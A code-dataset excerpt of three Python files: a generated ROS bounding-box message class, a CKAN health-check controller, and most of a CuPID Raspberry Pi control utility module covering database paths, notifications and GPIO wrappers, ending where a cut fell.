super(BoundingBoxes, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.image_header is None:
self.image_header = std_msgs.msg.Header()
if self.bounding_boxes is None:
self.bounding_boxes = []
else:
self.header = std_msgs.msg.Header()
self.image_header = std_msgs.msg.Header()
self.bounding_boxes = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs))
_x = self.image_header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.bounding_boxes)
buff.write(_struct_I.pack(length))
for val1 in self.bounding_boxes:
_x = val1.Class
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1
buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.image_header is None:
self.image_header = std_msgs.msg.Header()
if self.bounding_boxes is None:
self.bounding_boxes = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 12
(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.image_header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.image_header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.bounding_boxes = []
for i in range(0, length):
val1 = yolov3_pytorch_ros.msg.BoundingBox()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.Class = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.Class = str[start:end]
_x = val1
start = end
end += 40
(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])
self.bounding_boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs))
_x = self.image_header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.bounding_boxes)
buff.write(_struct_I.pack(length))
for val1 in self.bounding_boxes:
_x = val1.Class
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1
buff.write(_get_struct_d4q().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.image_header is None:
self.image_header = std_msgs.msg.Header()
if self.bounding_boxes is None:
self.bounding_boxes = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 12
(_x.image_header.seq, _x.image_header.stamp.secs, _x.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.image_header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.image_header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.bounding_boxes = []
for i in range(0, length):
val1 = yolov3_pytorch_ros.msg.BoundingBox()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.Class = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.Class = str[start:end]
_x = val1
start = end
end += 40
(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])
self.bounding_boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_d4q = None
def _get_struct_d4q():
global _struct_d4q
if _struct_d4q is None:
_struct_d4q = struct.Struct("<d4q")
return _struct_d4q
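# A minimal usage sketch (not produced by genpy): build a message and round-trip it through
# serialize()/deserialize(). BytesIO stands in for the buffer rospy normally supplies, and the
# box values are arbitrary examples.
def _bounding_boxes_sketch():
    from io import BytesIO
    msg = BoundingBoxes()
    msg.header.frame_id = 'camera'
    box = yolov3_pytorch_ros.msg.BoundingBox(
        Class='person', probability=0.87, xmin=10, ymin=20, xmax=110, ymax=220)
    msg.bounding_boxes.append(box)
    buff = BytesIO()
    msg.serialize(buff)
    decoded = BoundingBoxes()
    decoded.deserialize(buff.getvalue())
    return decoded.bounding_boxes[0].Class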
| 39.502825 | 145 | 0.660898 |
4a1f3deda29119f80674e2c22b3ffbd0802e4ddf | 2,587 | py | Python | ckanext/ckanext-apicatalog_routes/ckanext/apicatalog_routes/health.py | eetumans/api-catalog | a32a52c48425be8b71d83c60c93b26db7787e632 | ["MIT"] | null | null | null | ckanext/ckanext-apicatalog_routes/ckanext/apicatalog_routes/health.py | eetumans/api-catalog | a32a52c48425be8b71d83c60c93b26db7787e632 | ["MIT"] | null | null | null | ckanext/ckanext-apicatalog_routes/ckanext/apicatalog_routes/health.py | eetumans/api-catalog | a32a52c48425be8b71d83c60c93b26db7787e632 | ["MIT"] | null | null | null |
import ckan.lib.base as base
import pylons.config as config
import urllib2
import logging
import ckan.logic as logic
import datetime
from pprint import pformat
import ckan.model as model
get_action = logic.get_action
log = logging.getLogger(__name__)
SITE_URL_FAILURE_LOGMESSAGE = "Site URL '%s' failed to respond during health check."
HARVEST_FAILURE_LOGMESSAGE = "Harvester '%s' has errors:\n%s"
HARVEST_TIMEOUT_LOGMESSAGE = "Harvester '%s' is probably stuck:\n%s"
FAILURE_MESSAGE = "An error has occurred, check the server log for details"
SUCCESS_MESSAGE = "OK"
HARVEST_JOB_TIMESTAMP_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
HARVEST_JOB_TIMEOUT = datetime.timedelta(days=1)
def check_url(url):
try:
response = urllib2.urlopen(url, timeout=30)
return response.getcode() == 200
except urllib2.URLError:
return False
class HealthController(base.BaseController):
check_site_urls = ['/']
def check(self):
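        # This health check does two things: (1) verifies that every path in check_site_urls
        # responds with HTTP 200 on the configured ckan.site_url, and (2) verifies that no
        # harvest source reported errors in its last job or has left a job unfinished for
        # longer than HARVEST_JOB_TIMEOUT. Any failure is reported to the caller as HTTP 503;
        # success is reported as HTTP 200 ("OK").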
result = True
site_url = config.get('ckan.site_url')
for url in self.check_site_urls:
if not check_url("%s/%s" % (site_url, url)):
log.warn(SITE_URL_FAILURE_LOGMESSAGE % url)
result = False
harvest_source_list = get_action('harvest_source_list')
data_dict = {'return_last_job_status': True}
context = {'model': model,
'ignore_auth': True}
for harvest_source in harvest_source_list(context, data_dict):
last_job_status = harvest_source.get('last_job_status')
if last_job_status is not None:
num_errors = last_job_status.get('stats', {}) .get('errored', 0)
if num_errors > 0:
log.warn(HARVEST_FAILURE_LOGMESSAGE % (
harvest_source.get('title', ''),
pformat(harvest_source)))
result = False
elif not last_job_status.get('finished'):
harvest_job_created = last_job_status.get('created')
created = datetime.datetime.strptime(harvest_job_created, HARVEST_JOB_TIMESTAMP_FORMAT)
now = datetime.datetime.now()
if now - created > HARVEST_JOB_TIMEOUT:
log.warn(HARVEST_TIMEOUT_LOGMESSAGE % (
harvest_source.get('title', ''),
pformat(harvest_source)))
result = False
if result:
base.abort(200, SUCCESS_MESSAGE)
else:
base.abort(503, FAILURE_MESSAGE)
| 36.957143 | 107 | 0.614612 |
4a1f3e323abde038ea308713e75edf7e6f16bc5d | 32,126 | py | Python | cupid/pilib.py | iinnovations/iicontrollibs | 94af26a61405f1ad928d36e36602ebb859a2e44f | ["Apache-2.0"] | 11 | 2015-06-22T21:38:15.000Z | 2021-03-10T11:24:21.000Z | cupid/pilib.py | iinnovations/iicontrollibs | 94af26a61405f1ad928d36e36602ebb859a2e44f | ["Apache-2.0"] | null | null | null | cupid/pilib.py | iinnovations/iicontrollibs | 94af26a61405f1ad928d36e36602ebb859a2e44f | ["Apache-2.0"] | 12 | 2015-03-05T00:19:40.000Z | 2020-12-18T15:21:44.000Z |
#!/usr/bin/python3
__author__ = "Colin Reese"
__copyright__ = "Copyright 2016, Interface Innovations"
__credits__ = ["Colin Reese"]
__license__ = "Apache 2.0"
__version__ = "1.0"
__maintainer__ = "Colin Reese"
__email__ = "[email protected]"
__status__ = "Development"
import os
import sys
import inspect
top_folder = \
os.path.split(os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0])))[0]
if top_folder not in sys.path:
sys.path.insert(0, top_folder)
# This library is for use by all other pi
# functions
"""
Global declarations of useful variables. We are transitioning to bunches of definitions, which make
things easier to move around and simpler to assign iteratively, without needing hacks for
variable names.

Question: Which things are hard-coded here, and why is everything not simply in the database?
Answer: Only things which may need to be changed at run-time by the user/admin live in the database.
Log locations, for example, have no practical reason to be assigned there.
Log levels, on the other hand, may need to be regularly changed from the web UI.
We have hybrids (as above) where we set a default level here and then attempt to get updated values
from the database. We try to do this in as error-tolerant a fashion as we can.
"""
from iiutilities.utility import Bunch
from iiutilities import dblib
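# A minimal sketch of the pattern described above, assuming only that Bunch behaves as a
# simple attribute bag (roughly a class whose __init__ does self.__dict__.update(kwargs)).
# That behaviour is what makes the nested, dot-addressable config below (dirs.dbs.control,
# loglevels.io, ...) and the iterative assignment over __dict__ possible.
def _bunch_pattern_sketch():
    """Defined for illustration and never called at import time."""
    demo = Bunch()
    demo.paths = Bunch()
    demo.paths.control = '/var/www/data/control.db'
    demo.paths.log = '/var/www/data/logdata.db'
    # Iterate the attribute dict, mirroring how dbs is populated from dirs.dbs below
    return {name: path for name, path in demo.paths.__dict__.items()}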
dirs = Bunch()
dirs.baselib = '/usr/lib/iicontrollibs/'
dirs.web = '/var/www/'
dirs.database = dirs.web + 'data/'
dirs.onewire = '/var/1wire/'
dirs.output = dirs.web + 'data/'
dirs.log = '/var/log/cupid/'
dirs.archive = dirs.database + 'archive/'
dirs.safe = '/var/wwwsafe/'
dirs.dbs = Bunch()
dirs.dbs.control = dirs.database + 'control.db'
dirs.dbs.log = dirs.database + 'logdata.db'
dirs.dbs.session = dirs.database + 'authlog.db'
dirs.dbs.recipe = dirs.database + 'recipedata.db'
dirs.dbs.system = dirs.database + 'system.db'
dirs.dbs.motes = dirs.database + 'motes.db'
dirs.dbs.info = dirs.database + 'deviceinfo.db'
dirs.dbs.auths = dirs.database + 'authslog.db'
dirs.dbs.data_agent = '/var/wwwsafe/dataagent.db'
dirs.dbs.notifications = dirs.database + 'notifications.db'
dirs.dbs.safe = dirs.safe + 'safedata.db'
dirs.dbs.users = dirs.safe + 'users.db'
dirs.logs = Bunch()
dirs.logs.network = dirs.log + 'network.log'
dirs.logs.io = dirs.log + 'io.log'
dirs.logs.remote = dirs.log + 'remotes.log'
dirs.logs.system = dirs.log + 'systemstatus.log'
dirs.logs.control = dirs.log + 'control.log'
dirs.logs.daemon = dirs.log + 'daemon.log'
dirs.logs.actions = dirs.log + 'actions.log'
dirs.logs.serial = dirs.log + 'serial.log'
dirs.logs.notifications = dirs.log + 'notifications.log'
dirs.logs.daemonproc = dirs.log + 'daemonproc.log'
dirs.logs.error = dirs.log + 'error.log'
dirs.logs.db = dirs.log + 'db.log'
dbs = Bunch()
class cupidDatabase(dblib.sqliteDatabase):
def __init__(self, *args, **kwargs):
settings = {
'log_errors':True,
'log_path':dirs.logs.db,
'quiet':True
}
settings.update(kwargs)
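        # Caller-supplied keyword arguments take precedence over the cupid logging defaults above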
# This calls the parent init
super(cupidDatabase, self).__init__(*args, **settings)
for db_name in dirs.dbs.__dict__:
setattr(dbs, db_name, cupidDatabase(getattr(dirs.dbs, db_name)))
salt = 'a bunch of random characters and symbols for security'
maxlogsize = 1024 # kB
numlogs = 5
loglevels = Bunch()
# These just really serve as defaults. We pick them up later from the db.
loglevels.network = 5
loglevels.io = 3
loglevels.system = 4
loglevels.control = 4
loglevels.daemon = 3
loglevels.serial = 2
loglevels.actions = 2
loglevels.notifications = 5
daemonprocs = ['cupid/periodicupdateio.py', 'cupid/picontrol.py', 'cupid/systemstatus.py', 'cupid/sessioncontrol.py', 'mote/serialhandler.py']
daemonprocnames = ['updateio', 'picontrol', 'systemstatus', 'sessioncontrol', 'serialhandler']
schema = Bunch()
schema.channel = dblib.sqliteTableSchema([
# {'name': 'channelindex','type':'integer','primary':True},
{'name': 'name', 'unique': True},
{'name': 'index', 'type': 'integer', 'primary': True},
{'name': 'type', 'default': 'local'},
{'name': 'id', 'unique': True},
{'name': 'pv_input', 'default': 'none'},
{'name': 'sv_input', 'default': 'none'},
{'name': 'output_input', 'default': 'none'},
{'name': 'enabled_input', 'default': 'none'},
{'name': 'enabled', 'type': 'boolean', 'default': 0},
{'name': 'outputs_enabled', 'type': 'boolean', 'default': 0},
{'name': 'control_update_time'},
{'name': 'control_algorithm', 'default': 'on/off 1'},
{'name': 'control_recipe', 'default': 'none'},
{'name': 'recipe_stage', 'type': 'integer', 'default': 0},
{'name': 'recipe_start_time'},
{'name': 'recipe_stage_start_time'},
{'name': 'setpoint_value', 'type': 'real'},
{'name': 'process_value', 'type': 'real'},
{'name': 'process_value_time'},
{'name': 'positive_output'},
{'name': 'negative_output'},
{'name': 'action', 'type': 'real', 'default': 0},
{'name': 'mode', 'default': 'manual'},
{'name': 'status_message'},
{'name': 'log_options', 'default': 'mode:timespan,size:8,unit:hours'},
{'name': 'data'},
{'name': 'dataclasses'},
{'name': 'pending'}
])
schema.input = dblib.sqliteTableSchema([
{'name': 'id', 'primary':True},
{'name': 'interface'},
{'name': 'type'},
{'name': 'address'},
{'name': 'name'},
{'name': 'value', 'type': 'real'},
{'name': 'unit'},
{'name': 'polltime'},
{'name': 'pollfreq'},
{'name': 'ontime'},
{'name': 'offtime'},
{'name': 'log_options', 'default': 'mode:timespan,size:8,unit:hours'}
])
schema.channel_datalog = dblib.sqliteTableSchema([
{'name':'time','primary':True},
{'name':'process_value','type':'real'},
{'name':'setpoint_value','type':'real'},
{'name':'action','type':'real'},
{'name':'algorithm'},
{'name':'enabled','type':'real'},
{'name':'status_msg'}
])
schema.standard_datalog = dblib.sqliteTableSchema([
{'name':'time', 'primary':True},
{'name':'value', 'type':'real'}
])
schema.data_agent = dblib.sqliteTableSchema([
{'name':'data_id','primary':True},
{'name':'data_name'},
{'name':'send_freq', 'default':'0'}, # Seconds. Zero means whenever there is new data, send it
{'name':'last_send'},
{'name':'last_send_timestamp'},
{'name':'total_sends', 'type':'integer'},
{'name':'last_send_size','type':'integer'},
{'name':'cume_send_size','type':'integer'}
])
schema.data_items = dblib.sqliteTableSchema([
{'name':'valuename','primary':True},
{'name':'value'}
])
schema.mote = dblib.sqliteTableSchema([
{'name':'time'},
{'name':'message','primary':True},
{'name':'value'}
])
schema.users = dblib.sqliteTableSchema([
{'name':'id','type':'integer', 'primary':True},
{'name':'name'},
{'name':'password'},
{'name':'email'},
{'name':'temp'},
{'name':'authlevel','type':'integer','default':0}
])
"""
Utility Functions
# This function (dbnametopath, below) is what keeps things sane for our database handling.
# We moved all references to database paths out of the html entirely, and we
# pass handles instead. This does several things:
# 1. Centralizes all path references. No longer do we need to name paths in js as well as in python.
#    Now all references live on the server, where they belong. This way the html/js is totally agnostic to
#    where things live.
# 2. Removes any path information from the html. This matters because all html/js is visible to the world.
# 3. Eliminates the possibility of queries on databases that are not properly locked down. There are permissions in
#    place to require authorization for anything but read-only operation, and often for read-only operation as well,
#    but even better, we do aliasing server-side so that ONLY those databases that we alias (and only under the conditions
#    we specify) are even readable. It also puts in place a clean way of selectively allowing access via user auths/keywords.
# A minimal usage sketch follows the dbnametopath definition below.
"""
# Note: cupidDatabase, defined above, is the subclass that sets default pilib logging options.
def updateiicontrollibs(stash=False):
from iiutilities.gitupdatelib import stashrepo, pullrepo, updaterepoversion
repodirectory = dirs.baselib
originname = 'master'
if stash:
stashrepo(repodirectory, originname)
pullrepo(repodirectory, originname)
updaterepoversion(repodirectory)
print('update complete')
def updatecupidweblib(stash=False):
from iiutilities.gitupdatelib import stashrepo, pullrepo, updaterepoversion
repodirectory = dirs.web
originname = 'master'
if stash:
stashrepo(repodirectory,originname)
pullrepo(repodirectory, originname)
updaterepoversion(repodirectory)
print('update complete')
def table_name_to_type(tablename):
type = 'unknown'
subtype = 'unknown'
id = 'unknown'
try:
splits = tablename.split('_')
for test_type in ['input', 'channel']:
if splits[0] == test_type:
type = test_type
if splits[1].lower().find('gpio') >= 0:
subtype = 'gpio'
elif splits[1].lower().find('mote') >=0:
subtype = 'mote'
elif splits[1].lower().find('1wire') >=0:
subtype = '1wire'
id = '_'.join(splits[1:-1])
except:
pass
return {'type':type, 'subtype':subtype, 'id':id}
def dbnametopath(friendlyname):
friendlynames = ['controldb', 'logdatadb', 'infodb', 'systemdb', 'authdb', 'safedatadb', 'usersdb', 'motesdb', 'notificationsdb']
paths = [dirs.dbs.control, dirs.dbs.log, dirs.dbs.info, dirs.dbs.system, dirs.dbs.auths, dirs.dbs.safe, dirs.dbs.users, dirs.dbs.motes, dirs.dbs.notifications]
path = None
if friendlyname in friendlynames:
path = paths[friendlynames.index(friendlyname)]
return path
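# A minimal sketch of the aliasing described in the docstring above: web-facing code passes
# only a friendly handle, and the server resolves (or refuses to resolve) it to a real path.
# The handler name here is hypothetical; only dbnametopath and cupidDatabase are from this module.
def _aliased_db_read_sketch(friendlyname, tablename):
    dbpath = dbnametopath(friendlyname)
    if dbpath is None:
        # Unknown alias: nothing outside the list in dbnametopath is ever readable
        return {'error': 'database not recognized'}
    database = cupidDatabase(dbpath)
    return {'data': database.read_table(tablename)}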
def processnotification(notification):
from iiutilities import datalib
from iiutilities import utility
from iiutilities.netfun import pingstatus
senttime = datalib.gettimestring()
result = {'status':1, 'senttime':senttime}
if notification['type'] == 'email':
# Check to make sure we're online.
pingresult = pingstatus()
if not pingresult['status']:
utility.log(dirs.logs.notifications, 'WAN access is ok, so processing notification')
options = datalib.parseoptions(notification['options'])
message = notification['message']
if 'subject' in options:
subject = options['subject']
else:
subject = 'CuPID Notification Email'
message += '\r\n\r\n'
message += 'Message queued:\t ' + notification['queuedtime'] + '\r\n'
message += 'Message sent:\t ' + senttime + '\r\n'
if 'email' in options:
try:
email = options['email']
actionmail = utility.gmail(message=message, subject=subject, recipient=email)
                    actionmail.send()
                    # Mark success; process_notifications_queue treats status 0 as successfully sent
                    result['status'] = 0
except:
pass
else:
result['status'] = 0
else:
utility.log(dirs.logs.notifications, 'WAN access does not appear to be ok. Status is: ' + str(pingresult['status']))
return result
def process_notifications_queue():
from iiutilities import dblib
from iiutilities.utility import log
notifications_db = cupidDatabase(dirs.dbs.notifications)
queuednotifications = notifications_db.read_table('queued')
for notification in queuednotifications:
if loglevels.notifications >= 5:
log(dirs.logs.notifications, 'Processing notification of type' + notification['type'] + '. Message: ' + notification['message'] + '. Options: ' + notification['options'])
else:
log(dirs.logs.notifications, 'Processing notification of type' + notification['type'])
result = processnotification(notification)
if result['status'] == 0:
log(dirs.logs.notifications, 'Notification appears to have been successful. Copying message to sent.')
sententry = notification.copy()
sententry['senttime'] = result['senttime']
dblib.insertstringdicttablelist(dirs.dbs.notifications, 'sent', [sententry], droptable=False)
log(dirs.logs.notifications, 'Removing entry from queued messages.')
# match by time and message
conditionnames = ['queuedtime', 'message']
conditionvalues = [sententry['queuedtime'], sententry['message']]
notifications_db.delete('queued', {'conditionnames':conditionnames, 'conditionvalues':conditionvalues})
# delquery = dblib.makedeletesinglevaluequery('queuednotifications', {'conditionnames':conditionnames, 'conditionvalues':conditionvalues})
# dblib.sqlitequery(dirs.dbs.notifications, delquery)
else:
log(dirs.logs.notifications, 'Notification appears to have failed. Status: ' + str(result['status']))
def run_cupid_data_agent():
from iiutilities import dblib
# Get api info
safe_db = cupidDatabase(dirs.dbs.safe)
api_info = safe_db.read_table('api')
if not api_info:
print('No API info found. Aborting. ')
return
"""
IO functions
"""
def getgpiostatus():
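    # Parses the table printed by WiringPi's `gpio readall` by slicing fixed character columns
    # out of each row; the left and right halves of the table each describe one pin, so a
    # single line can contribute up to two entries to the returned list.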
from subprocess import check_output
gpiolist=[]
alloutput = check_output(['gpio','readall']).decode('utf-8')
lines = alloutput.split('\n')[3:18]
for line in lines:
BCM1 = line[4:6].strip()
wpi1 = line[10:12].strip()
name1 = line[15:22].strip()
mode1 = line[25:30].strip()
val1 = line[32:34].strip()
phys1 = line[36:39].strip()
phys2 = line[42:44].strip()
val2 = line[46:48].strip()
mode2 = line[50:55].strip()
name2 = line[57:65].strip()
wpi2 = line[68:70].strip()
BCM2 = line[74:76].strip()
if BCM1 and BCM1 != '--':
# print(BCM1 + ':' + wpi1 + ':' + name1 + ':' + mode1 + ':' + val1 + ':' + phys1)
gpiolist.append({'BCM': BCM1, 'wpi': wpi1, 'name': name1, 'mode': mode1, 'value': val1, 'phys': phys1})
if BCM2 and BCM2 != '--':
# print(BCM2 + ':' + wpi2 + ':' + name2 + ':' + mode2 + ':' + val2 + ':' + phys2)
gpiolist.append({'BCM': BCM2, 'wpi': wpi2, 'name': name2, 'mode': mode2, 'value': val2, 'phys': phys2})
return gpiolist
class io_wrapper(object):
"""
    This is a general class of IO handler that has identifying values to match against (so we know when we
    need to destroy and recreate it), and that can run functions in the background, such as pigpiod callbacks. This way
    we can do more than atomic read/write operations. For GPIO, we can even set callbacks for value changes.
    A usage sketch for the concrete wrappers appears at the end of this module.
"""
def __init__(self, **kwargs):
# self.required_properties = ['type','options', 'pi']
self.required_properties = ['pi']
if not all(property in kwargs for property in self.required_properties):
print('You did not provide all required parameters: ' + str(self.required_properties))
self.settings = {}
self.settings.update(kwargs)
for key,value in self.settings.items():
setattr(self, key, value)
class pigpiod_gpio_counter(io_wrapper):
def __init__(self, **kwargs):
import copy
# inherit parent properties
super(pigpiod_gpio_counter, self).__init__(**kwargs)
import pigpio
self.settings = {'edge':'falling', 'pullupdown':None, 'debounce_ms':10, 'event_min_ms':10,
'watchdog_ms':1000, 'rate_period_ms':2000, 'debug':False, 'reset_ticks':30000,
'busy':False, 'init_counts':0}
self.settings.update(kwargs)
for key,value in self.settings.items():
setattr(self, key, value)
self.pi.set_mode(self.gpio, pigpio.INPUT)
self.pi.set_glitch_filter(self.gpio, self.settings['debounce_ms'] * 1000)
if self.pullupdown in ['up', 'pullup']:
self.pi.set_pull_up_down(self.gpio, pigpio.PUD_UP)
self._cb = self.pi.callback(self.gpio, pigpio.FALLING_EDGE, self._cbf)
self.pi.set_watchdog(self.gpio, self.watchdog_ms)
self.busy = False
self.ticks = copy.copy(self.settings['init_counts'])
self.last_event_count = 0
self.last_counts = copy.copy(self.settings['init_counts'])
if self.settings['init_counts']:
from datetime import datetime
self.last_counts_time = datetime.now()
else:
self.last_counts_time = None
self.rate = 0
def _cbf(self, gpio, level, tick):
if not self.busy:
self.busy = True
self.process_callback(gpio, level, tick)
def process_callback(self, gpio, level, tick):
# a tick event happened
import time
try:
if level == 0: # Falling edge
# time.sleep(0.001 * self.debounce_ms)
# value = self.pi.read(self.gpio)
# if value == 0:
# print('event length satisfied')
# if tick - self.last_event_count > self.debounce_ms * 1000:
self.ticks += 1
self.last_event_count = tick
# else:
# if self.debug:
# print('debounce')
# else:
# print('event not long enough ( we waited to see ).')
# pass
elif level == 2: # Watchdog timeout. We will calculate
pass
self.busy = False
except:
pass
# import traceback
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print("*** ****************************************************")
# print('PROCESSING ERROR')
# errorstring = traceback.format_exc()
# print(errorstring)
def get_value(self):
from datetime import datetime
now = datetime.now()
if self.last_counts_time:
seconds_delta = now - self.last_counts_time
seconds_passed = seconds_delta.seconds + float(seconds_delta.microseconds) / 1000000
self.rate = float(self.ticks - self.last_counts) / seconds_passed
if self.debug:
print('COUNTING RATE')
print(self.last_counts, self.ticks)
self.last_counts = self.ticks
self.last_counts_time = now
if self.ticks > self.reset_ticks:
if self.debug:
print('RESETTINGS (count is ' + str(self.ticks) + ')')
print('reset_ticks : ' + str(self.reset_ticks))
self.last_counts -= self.reset_ticks
self.ticks -= self.reset_ticks
# self.event_tick = 0 # reset event
return self.ticks
def get_rate(self):
return self.rate
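# Worked example of the bookkeeping above (numbers are illustrative): if the
# previous get_value() ran 2.0 s ago with last_counts = 100 and ticks is now
# 150, then rate = (150 - 100) / 2.0 = 25 ticks/s, after which last_counts and
# last_counts_time are advanced. When ticks exceeds reset_ticks, both ticks and
# last_counts are shifted down by reset_ticks, so the computed rate is unaffected.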
class pigpiod_gpio_input(io_wrapper):
def __init__(self, **kwargs):
# inherit parent properties
super(pigpiod_gpio_input, self).__init__(**kwargs)
import pigpio
self.settings = {'pullupdown': None}
self.settings.update(kwargs)
for key, value in self.settings.items():
setattr(self, key, value)
self.pi.set_mode(self.gpio, pigpio.INPUT)
if self.pullupdown in ['up', 'pullup']:
self.pi.set_pull_up_down(self.gpio, pigpio.PUD_UP)
elif self.pullupdown in ['down','pulldown']:
self.pi.set_pull_up_down(self.gpio, pigpio.PUD_DOWN)
def get_value(self):
return self.pi.read(self.gpio)
class pigpiod_gpio_output(io_wrapper):
def __init__(self, **kwargs):
# inherit parent properties
super(pigpiod_gpio_output, self).__init__(**kwargs)
import pigpio
self.settings = {}
self.settings.update(kwargs)
for key, value in self.settings.items():
setattr(self, key, value)
self.pi.set_mode(self.gpio, pigpio.OUTPUT)
def get_value(self):
return self.pi.read(self.gpio)
def set_value(self, value):
self.pi.write(self.gpio, value)
"""
Auths helpers
"""
def check_action_auths(action, level):
action_auths_dict = {
'gettabledata':1,
'modifychannel':3,
'enablechannel':2,
'modifyaction':3,
'modifychannelalarm':3,
'enableaction':2,
'userdelete':5, 'useradd':5, 'usermodify':5,
'setvalue':4,
'setsystemflag':5,
'getmbtcpdata':2,
'getfiletext':5,
'dump':999
}
# Currently setup to blacklist only.
if action in action_auths_dict:
level_required = action_auths_dict[action]
else:
level_required = 0
try:
if int(level) >= level_required:
authorized = True
else:
authorized = False
except:
authorized = False
print('Action ' + action + ', ' + str(level) + ' provided, ' + str(level_required) + ' required : ' + str(authorized))
return authorized
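# Illustrative calls against the table above:
#   check_action_auths('setvalue', 3) -> False (level 4 required)
#   check_action_auths('gettabledata', 1) -> True
#   check_action_auths('someotheraction', 0) -> True (unlisted actions require level 0)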
"""
Authlog functions
"""
def checklivesessions(authdb, user, expiry):
import time
from iiutilities.datalib import timestringtoseconds
activesessions = 0
sessions = dbs.authdb.read_table('sessions')
for session in sessions:
sessioncreation = timestringtoseconds(session['timecreated'])
currenttime = time.mktime(time.localtime())
if currenttime - sessioncreation < expiry:
activesessions += 1
return activesessions
"""
WSGI helpers
"""
# This needs to be a subroutine, since it's very commonly used.
def app_check_keywords(d, required_keywords, output):
if not all(keyword in d for keyword in required_keywords):
output['message'] += 'Not all required keywords found. '
for keyword in required_keywords:
if keyword not in d:
output['message'] += '{} not found. '.format(keyword)
return False
else:
return True
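# Example with a hypothetical request dict:
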